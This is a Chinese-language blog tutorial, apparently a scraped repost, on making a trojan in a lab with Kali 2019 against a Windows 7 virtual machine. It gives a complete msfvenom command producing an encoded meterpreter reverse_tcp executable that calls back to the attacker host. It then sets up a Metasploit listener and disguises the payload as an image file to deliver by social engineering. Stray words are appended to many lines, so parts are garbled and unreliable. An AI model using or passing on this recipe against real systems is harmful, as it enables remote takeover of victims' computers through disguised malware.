漏洞復現:使用Kali製做木馬程序

漏洞復現:使用Kali製做木馬程序windows

 

 

攻擊機:Kali2019tcp

靶機:Win7 64位spa

 

 

攻擊步驟:3d

1.打開Kali2019和Win7 64位虛擬機,肯定IP地址在一個網段blog

 

 2.肯定好IP地址,進入Kali2019進行木馬文件.exe製做,命令以下圖片

命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=172.16.66.128 LPORT=5555 -f exe >pink.exe虛擬機

 

 備註:咱們選擇的靶機是Win7 64位,因此兼容性必定要設置好,不然會出錯it

3.接下來打開msf,編輯遠程模塊,設置payload,具體流程看圖io

 

 

 4.開始設置Payload信息,輸入show options查看,lhost和lport都要設置成exe文件中設置的地址和端口號兼容性

 

 5.輸入exploit開始運行監聽模塊,開始監聽

 

 6.把剛剛生成的pink程序經過壓縮合並,製做一個圖片exe文件,經過社工或者其餘方法上傳到win7 64位虛擬機中

 

 7.運行這個文件,圖片會打開,Kali2019會收到鏈接成功的提示

 

 

 

 

 

 8.成功獲取win7權限,滲透成功

相關文章
相關標籤/搜索